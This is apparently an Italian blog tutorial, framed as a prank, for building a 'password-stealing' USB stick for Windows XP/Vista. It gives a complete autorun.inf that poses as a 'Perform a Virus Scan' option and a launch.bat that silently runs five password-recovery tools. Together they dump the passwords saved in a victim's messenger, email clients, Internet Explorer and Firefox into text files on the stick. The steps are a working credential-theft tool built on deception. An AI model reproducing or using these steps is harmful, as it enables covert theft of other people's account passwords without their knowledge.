Guida: creare una penna USB ruba-password per spaventare gli amici (Windows XP/Vista)


3448554130_488a9ea923

Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti.
Con questo quadretto (abbastanza desolante) di fronte a noi, possiamo dar libero sfogo alla nostra fantasia da geek e mettere in pratica un esperimento a metà strada tra il perfido e l’astuto: la creazione di una penna USB ruba-password che, una volta inserita nel PC della vittima designata, avvia una finta scansione antivirus mentre salva in alcuni file di testo tutte le parole chiave rintracciate in browser, programmi di chat e client di posta elettronica.
Ecco la procedura per crearne una. Ma ricordate, si tratta solo di un esperimento “simpatico”: nulla di particolarmente elaborato e, soprattutto, nulla che debba essere usato in contesti diversi da quello goliardico. Divertitevi!
  • Scaricare i programmi MessenPass (recupera password da tutti i più popolari software di IM), Mail PassView (recupera password da tutti i principali client per la posta elettronica), IE Passview (recupera le password da Internet Explorer), Protected Storage PassView (recupera password da Internet Explorer, Outlook Express ed MSN Explorer) e Password Fox (recupera password da Firefox);

  • Copiare gli eseguibili di tutti questi programmi (mspass.exe, mailpv.exe, iepv.exe, pspv.exe e passwordfox.exe) nella directory principale della penna USB da utilizzare come “ruba-password”;
  • Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come autorun.inf, sempre nella directory principale della penna USB:
  • [autorun]

    open=launch.bat

    ACTION= Perform a Virus Scan

  • Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come launch.bat, sempre nella directory principale della penna USB:
  • start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start passwordfox.exe /stext passwordfox.txt

  • Inserire la penna USB nel PC dal quale s’intende rubare le password e, nella schermata dell’autorun, selezionare la voce Perform a Virus Scan;
  • Attendere che la finta procedura di scansione antivirus termini e godersi il frutto del proprio lavoro truffaldino (le parole chiave vengono tutte conservate in dei file di testo contenuti nella penna stessa).
%d blogger cliccano Mi Piace per questo: